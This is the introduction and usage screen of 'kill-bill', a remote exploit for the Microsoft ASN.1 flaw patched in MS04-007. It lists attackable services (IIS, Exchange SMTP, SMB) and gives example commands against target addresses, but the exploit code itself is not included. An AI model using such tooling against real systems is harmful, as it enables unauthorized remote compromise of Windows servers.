I. Introduction

This code exploits a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch.

II. Screenshots

$ ./kill-bill.pl

. kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
  by Solar Eclipse <solareclipse@phreedom.org>

Usage: kill-bill -p <port> -s <service> host

Services:
  iis        IIS HTTP server (port 80)
  iis-ssl    IIS HTTP server with SSL (port 443)
  exchange   Microsoft Exchange SMTP server (port 25)
  smb-nbt    SMB over NetBIOS (port 139)
  smb        SMB (port 445)

If a service is running on its default port you don't have to
specify both the service and the port.

Examples: kill-bill -s iis 192.168.0.1
          kill-bill -p 80 192.168.0.1
          kill-bill -p 1234 -s smb 192.168.0.1